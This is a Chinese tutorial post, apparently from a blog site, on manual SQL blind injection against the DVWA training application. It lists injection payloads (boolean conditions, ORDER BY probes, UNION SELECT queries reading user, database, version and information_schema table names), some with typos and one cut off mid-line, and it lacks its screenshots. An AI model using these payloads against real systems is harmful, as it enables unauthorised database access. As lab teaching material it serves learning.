WEB手动漏洞挖掘-SQL盲注(DVWA实战)

本文通过DVWA实战,详细介绍了WEB渗透中SQL盲注的原理和方法。首先从基础的SQL盲注开始,如利用'1=1'的条件获取正确结果。接着讲解了模糊匹配技巧,并使用Burp Suite辅助进行反复尝试,通过返回信息判断数据库内容。通过ASCII码计算,逐步揭示字符串。最后,对比不同安全级别页面的响应差异,突出盲注的特点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里写图片描述
这里写图片描述
select * from table_name where id = ’ 1’ and 1=1– ’
这里写图片描述
在盲注里至少要有一个正确的结果;否则不显示;
这里写图片描述
这里写图片描述
这里写图片描述

1'order by 5--+
1'order by 3--+

1'union select 1,2--+
1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),version())--+
1'and 1=0 union select null,table_name from information_schema,table#
1'and 1=0 union select null,table_name from information_schema,columns where table_name='user'#

这里写图片描述
这里写图片描述

猜列明: 1'and column not null</
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值